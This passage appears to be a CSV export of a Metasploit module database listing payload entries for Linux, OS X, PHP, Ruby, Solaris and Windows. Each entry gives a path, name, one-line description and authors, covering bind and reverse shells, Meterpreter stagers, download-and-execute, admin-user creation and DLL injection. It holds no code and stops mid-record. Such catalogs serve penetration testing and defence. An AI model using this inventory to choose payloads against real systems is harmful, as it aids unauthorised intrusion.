2102,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb","payload","linux/x86/meterpreter/bind_nonx_tcp","payload/linux/x86/meterpreter/bind_nonx_tcp","Linux Meterpreter, Bind TCP Stager",300,"Listen for a connection, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , skape "
2103,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_tcp.rb","payload","linux/x86/meterpreter/bind_tcp","payload/linux/x86/meterpreter/bind_tcp","Linux Meterpreter, Bind TCP Stager",300,"Listen for a connection, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , skape "
2104,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/find_tag.rb","payload","linux/x86/meterpreter/find_tag","payload/linux/x86/meterpreter/find_tag","Linux Meterpreter, Find Tag Stager",300,"Use an established connection, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , skape "
2105,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb","payload","linux/x86/meterpreter/reverse_ipv6_tcp","payload/linux/x86/meterpreter/reverse_ipv6_tcp","Linux Meterpreter, Reverse TCP Stager (IPv6)",300,"Connect back to attacker over IPv6, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , kris katterjohn "
2106,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb","payload","linux/x86/meterpreter/reverse_nonx_tcp","payload/linux/x86/meterpreter/reverse_nonx_tcp","Linux Meterpreter, Reverse TCP Stager",300,"Connect back to the attacker, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , skape "
2107,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_tcp.rb","payload","linux/x86/meterpreter/reverse_tcp","payload/linux/x86/meterpreter/reverse_tcp","Linux Meterpreter, Reverse TCP Stager",300,"Connect back to the attacker, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , skape "
2108,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb","payload","linux/x86/metsvc_bind_tcp","payload/linux/x86/metsvc_bind_tcp","Linux Meterpreter Service, Bind TCP",300,"Stub payload for interacting with a Meterpreter Service","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2109,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb","payload","linux/x86/metsvc_reverse_tcp","payload/linux/x86/metsvc_reverse_tcp","Linux Meterpreter Service, Reverse TCP Inline",300,"Stub payload for interacting with a Meterpreter Service","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2110,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/read_file.rb","payload","linux/x86/read_file","payload/linux/x86/read_file","Linux Read File",300,"Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor","Metasploit Framework License (BSD)","f",,,,,"t",,"hal"
2111,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb","payload","linux/x86/shell/bind_ipv6_tcp","payload/linux/x86/shell/bind_ipv6_tcp","Linux Command Shell, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , kris katterjohn , skape "
2112,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb","payload","linux/x86/shell/bind_nonx_tcp","payload/linux/x86/shell/bind_nonx_tcp","Linux Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape "
2113,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_tcp.rb","payload","linux/x86/shell/bind_tcp","payload/linux/x86/shell/bind_tcp","Linux Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , skape "
2114,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/find_tag.rb","payload","linux/x86/shell/find_tag","payload/linux/x86/shell/find_tag","Linux Command Shell, Find Tag Stager",300,"Use an established connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape "
2115,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb","payload","linux/x86/shell/reverse_ipv6_tcp","payload/linux/x86/shell/reverse_ipv6_tcp","Linux Command Shell, Reverse TCP Stager (IPv6)",300,"Connect back to attacker over IPv6, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"kris katterjohn , skape "
2116,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb","payload","linux/x86/shell/reverse_nonx_tcp","payload/linux/x86/shell/reverse_nonx_tcp","Linux Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape "
2117,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/reverse_tcp.rb","payload","linux/x86/shell/reverse_tcp","payload/linux/x86/shell/reverse_tcp","Linux Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , skape "
2118,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb","payload","linux/x86/shell_bind_ipv6_tcp","payload/linux/x86/shell_bind_ipv6_tcp","Linux Command Shell, Bind TCP Inline (IPv6)",300,"Listen for a connection over IPv6 and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn "
2119,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_bind_tcp.rb","payload","linux/x86/shell_bind_tcp","payload/linux/x86/shell_bind_tcp","Linux Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2120,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_find_port.rb","payload","linux/x86/shell_find_port","payload/linux/x86/shell_find_port","Linux Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2121,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_find_tag.rb","payload","linux/x86/shell_find_tag","payload/linux/x86/shell_find_tag","Linux Command Shell, Find Tag Inline",300,"Spawn a shell on an established connection (proxy/nat safe)","Metasploit Framework License (BSD)","f",,,,,"t",,"skape "
2122,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb","payload","linux/x86/shell_reverse_tcp","payload/linux/x86/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2123,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb","payload","linux/x86/shell_reverse_tcp2","payload/linux/x86/shell_reverse_tcp2","Linux Command Shell, Reverse TCP Inline - Metasm Demo",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Julien Tinnes , Yoann Guillot, skape "
2124,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/netware/reverse_tcp.rb","payload","netware/shell/reverse_tcp","payload/netware/shell/reverse_tcp","NetWare Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Connect to the NetWare console (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"toto"
2125,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/armle/bind_tcp.rb","payload","osx/armle/execute/bind_tcp","payload/osx/armle/execute/bind_tcp","OS X Write and Execute Binary, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm "
2126,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/armle/reverse_tcp.rb","payload","osx/armle/execute/reverse_tcp","payload/osx/armle/execute/reverse_tcp","OS X Write and Execute Binary, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm "
2127,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/armle/bind_tcp.rb","payload","osx/armle/shell/bind_tcp","payload/osx/armle/shell/bind_tcp","OS X Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm "
2128,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/armle/reverse_tcp.rb","payload","osx/armle/shell/reverse_tcp","payload/osx/armle/shell/reverse_tcp","OS X Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm "
2129,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/armle/shell_bind_tcp.rb","payload","osx/armle/shell_bind_tcp","payload/osx/armle/shell_bind_tcp","Apple iOS Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2130,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb","payload","osx/armle/shell_reverse_tcp","payload/osx/armle/shell_reverse_tcp","Apple iOS Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2131,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/armle/vibrate.rb","payload","osx/armle/vibrate","payload/osx/armle/vibrate","Apple iOS iPhone Vibrate",300,"Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. 
Based on work by Charlie Miller .","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2132,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/ppc/bind_tcp.rb","payload","osx/ppc/shell/bind_tcp","payload/osx/ppc/shell/bind_tcp","OS X Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm " 2133,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/ppc/find_tag.rb","payload","osx/ppc/shell/find_tag","payload/osx/ppc/shell/find_tag","OS X Command Shell, Find Tag Stager",300,"Use an established connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm " 2134,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/ppc/reverse_tcp.rb","payload","osx/ppc/shell/reverse_tcp","payload/osx/ppc/shell/reverse_tcp","OS X Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm " 2135,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb","payload","osx/ppc/shell_bind_tcp","payload/osx/ppc/shell_bind_tcp","OS X Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2136,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb","payload","osx/ppc/shell_reverse_tcp","payload/osx/ppc/shell_reverse_tcp","OS X Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2137,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x64/bind_tcp.rb","payload","osx/x64/dupandexecve/bind_tcp","payload/osx/x64/dupandexecve/bind_tcp","OS X dup2 Command 
Shell, Bind TCP Stager",300,"Listen, read length, read buffer, execute, dup2 socket in edi, then execve","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"nemo, nemo " 2138,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x64/reverse_tcp.rb","payload","osx/x64/dupandexecve/reverse_tcp","payload/osx/x64/dupandexecve/reverse_tcp","OS X dup2 Command Shell, Reverse TCP Stager",300,"Connect, read length, read buffer, execute, dup2 socket in edi, then execve","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"nemo, nemo " 2139,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x64/exec.rb","payload","osx/x64/exec","payload/osx/x64/exec","OS X x64 Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"argp " 2140,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x64/say.rb","payload","osx/x64/say","payload/osx/x64/say","OSX X64 say Shellcode",300,"Say an arbitrary string outloud using Mac OS X text2speech","Metasploit Framework License (BSD)","f",,,,,"t",,"nemo " 2141,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x64/shell_bind_tcp.rb","payload","osx/x64/shell_bind_tcp","payload/osx/x64/shell_bind_tcp","OS X x64 Shell Bind TCP",300,"Bind an arbitrary command to an arbitrary port","Metasploit Framework License (BSD)","f",,,,,"t",,"nemo " 2142,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x64/shell_find_tag.rb","payload","osx/x64/shell_find_tag","payload/osx/x64/shell_find_tag","OSX Command Shell, Find Tag Inline",300,"Spawn a shell on an established connection (proxy/nat safe)","Metasploit Framework License (BSD)","f",,,,,"t",,"nemo " 2143,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb","payload","osx/x64/shell_reverse_tcp","payload/osx/x64/shell_reverse_tcp","OS X x64 Shell Reverse 
TCP",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"nemo " 2144,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/bind_tcp.rb","payload","osx/x86/bundleinject/bind_tcp","payload/osx/x86/bundleinject/bind_tcp","Mac OS X Inject Mach-O Bundle, Bind TCP Stager",300,"Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2145,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/reverse_tcp.rb","payload","osx/x86/bundleinject/reverse_tcp","payload/osx/x86/bundleinject/reverse_tcp","Mac OS X Inject Mach-O Bundle, Reverse TCP Stager",300,"Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2146,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/exec.rb","payload","osx/x86/exec","payload/osx/x86/exec","OS X Execute Command",300,"Execute an arbitrary command","BSD License","f",,,,,"t",,"argp , snagg " 2147,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/bind_tcp.rb","payload","osx/x86/isight/bind_tcp","payload/osx/x86/isight/bind_tcp","Mac OS X x86 iSight Photo Capture, Bind TCP Stager",300,"Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2148,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/reverse_tcp.rb","payload","osx/x86/isight/reverse_tcp","payload/osx/x86/isight/reverse_tcp","Mac OS X x86 iSight Photo Capture, Reverse TCP Stager",300,"Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)","[""Metasploit Framework License 
(BSD)""]","f",,,,,"t",,"ddz " 2149,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/shell_bind_tcp.rb","payload","osx/x86/shell_bind_tcp","payload/osx/x86/shell_bind_tcp","OS X Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2150,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/shell_find_port.rb","payload","osx/x86/shell_find_port","payload/osx/x86/shell_find_port","OS X Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2151,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb","payload","osx/x86/shell_reverse_tcp","payload/osx/x86/shell_reverse_tcp","OS X Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2152,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/bind_tcp.rb","payload","osx/x86/vforkshell/bind_tcp","payload/osx/x86/vforkshell/bind_tcp","OS X (vfork) Command Shell, Bind TCP Stager",300,"Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2153,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/reverse_tcp.rb","payload","osx/x86/vforkshell/reverse_tcp","payload/osx/x86/vforkshell/reverse_tcp","OS X (vfork) Command Shell, Reverse TCP Stager",300,"Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2154,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb","payload","osx/x86/vforkshell_bind_tcp","payload/osx/x86/vforkshell_bind_tcp","OS X (vfork) Command Shell, Bind TCP Inline",300,"Listen for a connection, vfork if necessary, and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"ddz " 2155,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb","payload","osx/x86/vforkshell_reverse_tcp","payload/osx/x86/vforkshell_reverse_tcp","OS X (vfork) Command Shell, Reverse TCP Inline",300,"Connect back to attacker, vfork if necessary, and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"ddz " 2156,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/bind_perl.rb","payload","php/bind_perl","payload/php/bind_perl","PHP Command Shell, Bind TCP (via Perl)",300,"Listen for a connection and spawn a command shell via perl (persistent)","BSD License","f",,,,,"t",,"Samy , cazz " 2157,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/bind_perl_ipv6.rb","payload","php/bind_perl_ipv6","payload/php/bind_perl_ipv6","PHP Command Shell, Bind TCP (via perl) IPv6",300,"Listen for a connection and spawn a command shell via perl (persistent) over IPv6","BSD License","f",,,,,"t",,"Samy , cazz " 2158,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/bind_php.rb","payload","php/bind_php","payload/php/bind_php","PHP Command Shell, Bind TCP (via PHP)",300,"Listen for a connection and spawn a command shell via php","BSD License","f",,,,,"t",,"diaul , egypt " 2159,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/bind_php_ipv6.rb","payload","php/bind_php_ipv6","payload/php/bind_php_ipv6","PHP Command Shell, Bind TCP (via php) IPv6",300,"Listen for a connection and spawn a command shell via php (IPv6)","BSD 
License","f",,,,,"t",,"diaul , egypt " 2160,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/download_exec.rb","payload","php/download_exec","payload/php/download_exec","PHP Executable Download and Execute",300,"Download an EXE from an HTTP URL and execute it","BSD License","f",,,,,"t",,"egypt " 2161,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/exec.rb","payload","php/exec","payload/php/exec","PHP Execute Command ",300,"Execute a single system command","BSD License","f",,,,,"t",,"egypt " 2162,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/php/bind_tcp.rb","payload","php/meterpreter/bind_tcp","payload/php/meterpreter/bind_tcp","PHP Meterpreter, Bind TCP Stager",300,"Listen for a connection, Run a meterpreter server in PHP","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt " 2163,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/php/bind_tcp_ipv6.rb","payload","php/meterpreter/bind_tcp_ipv6","payload/php/meterpreter/bind_tcp_ipv6","PHP Meterpreter, Bind TCP Stager IPv6",300,"Listen for a connection over IPv6, Run a meterpreter server in PHP","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt " 2164,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/php/reverse_tcp.rb","payload","php/meterpreter/reverse_tcp","payload/php/meterpreter/reverse_tcp","PHP Meterpreter, PHP Reverse TCP Stager",300,"Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt " 2165,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/meterpreter_reverse_tcp.rb","payload","php/meterpreter_reverse_tcp","payload/php/meterpreter_reverse_tcp","PHP Meterpreter, Reverse TCP Inline",300,"Connect back to attacker and spawn a Meterpreter server (PHP)","Metasploit Framework License 
(BSD)","f",,,,,"t",,"egypt " 2166,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/reverse_perl.rb","payload","php/reverse_perl","payload/php/reverse_perl","PHP Command, Double reverse TCP connection (via Perl)",300,"Creates an interactive shell via perl","BSD License","f",,,,,"t",,"cazz " 2167,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/reverse_php.rb","payload","php/reverse_php","payload/php/reverse_php","PHP Command Shell, Reverse TCP (via PHP)",300,"Reverse PHP connect back shell with checks for disabled functions","BSD License","f",,,,,"t",,"egypt " 2168,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/shell_findsock.rb","payload","php/shell_findsock","payload/php/shell_findsock","PHP Command Shell, Find Sock",300,"Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. 
Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.","BSD License","f",,,,,"t",,"egypt " 2169,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb","payload","python/shell_reverse_tcp_ssl","payload/python/shell_reverse_tcp_ssl","Unix Command Shell, Reverse TCP SSL (via python)",300,"Creates an interactive shell via python, uses SSL, encodes with base64 by design.","BSD License","f",,,,,"t",,"RageLtMan" 2170,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/ruby/shell_bind_tcp.rb","payload","ruby/shell_bind_tcp","payload/ruby/shell_bind_tcp","Ruby Command Shell, Bind TCP",300,"Continually listen for a connection and spawn a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , kris katterjohn " 2171,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb","payload","ruby/shell_bind_tcp_ipv6","payload/ruby/shell_bind_tcp_ipv6","Ruby Command Shell, Bind TCP IPv6",300,"Continually listen for a connection and spawn a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , kris katterjohn " 2172,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/ruby/shell_reverse_tcp.rb","payload","ruby/shell_reverse_tcp","payload/ruby/shell_reverse_tcp","Ruby Command Shell, Reverse TCP",300,"Connect back and create a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , kris katterjohn " 2173,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb","payload","ruby/shell_reverse_tcp_ssl","payload/ruby/shell_reverse_tcp_ssl","Ruby Command Shell, Reverse TCP SSL",300,"Connect back and create a command shell via Ruby, uses SSL","Metasploit Framework License (BSD)","f",,,,,"t",,"RageLtMan" 2174,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb","payload","solaris/sparc/shell_bind_tcp","payload/solaris/sparc/shell_bind_tcp","Solaris Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2175,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/sparc/shell_find_port.rb","payload","solaris/sparc/shell_find_port","payload/solaris/sparc/shell_find_port","Solaris Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2176,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb","payload","solaris/sparc/shell_reverse_tcp","payload/solaris/sparc/shell_reverse_tcp","Solaris Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2177,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb","payload","solaris/x86/shell_bind_tcp","payload/solaris/x86/shell_bind_tcp","Solaris Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2178,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/x86/shell_find_port.rb","payload","solaris/x86/shell_find_port","payload/solaris/x86/shell_find_port","Solaris Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2179,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb","payload","solaris/x86/shell_reverse_tcp","payload/solaris/x86/shell_reverse_tcp","Solaris Command Shell, Reverse 
TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2180,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/tty/unix/interact.rb","payload","tty/unix/interact","payload/tty/unix/interact","Unix TTY, Interact with Established Connection",300,"Interacts with a TTY on an established socket connection","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2181,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/adduser.rb","payload","windows/adduser","payload/windows/adduser","Windows Execute net user /ADD",300,"Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)","[""Metasploit Framework License (BSD)""]","t",,,,,"t",,"Chris John Riley, hdm , sf , vlad902 " 2182,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/dllinject/bind_ipv6_tcp","payload/windows/dllinject/bind_ipv6_tcp","Reflective DLL Injection, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2183,"2013-05-07 